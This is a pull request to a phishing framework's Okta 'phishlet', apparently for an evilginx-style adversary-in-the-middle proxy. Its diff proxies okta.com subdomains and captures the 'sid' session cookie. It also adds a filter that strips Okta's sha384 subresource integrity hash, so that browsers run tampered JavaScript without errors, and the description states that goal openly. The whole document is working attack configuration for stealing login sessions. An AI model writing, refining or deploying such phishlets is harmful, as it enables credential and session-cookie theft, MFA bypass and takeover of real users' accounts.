### PR TITLE
Update okta.yaml bypass integrity check

### DIFF
--- a/phishlets/okta.yaml
+++ b/phishlets/okta.yaml
@@ -4,7 +4,8 @@ proxy_hosts:
   - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
   - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
   - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
-sub_filters: []
+sub_filters:
+  - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384', replace: 'sha123', mimes: ['text/html']}
 auth_tokens:
   - domain: 'EXAMPLE.okta.com'
     keys: ['sid']

--- a/phishlets/okta.yaml
+++ b/phishlets/okta.yaml
@@ -5,7 +5,7 @@ proxy_hosts:
   - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
   - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
 sub_filters:
-  - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384', replace: 'sha123', mimes: ['text/html']}
+  - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-kPXcto1qCzOfdWQH/GuCTAx104vf036zjQGmDflpIypbdkTbv9EA/d9VNWXoZLPY', replace: '', mimes: ['text/html']}
 auth_tokens:
   - domain: 'EXAMPLE.okta.com'
     keys: ['sid']


### PR DESCRIPTION
Okta has subresource integrity checking on the .js files it loads. This will remove the sha384 integrity check and allow the browser to render the JavaScript without errors.

Looked at a few different companies using Okta and the hash being used is the same.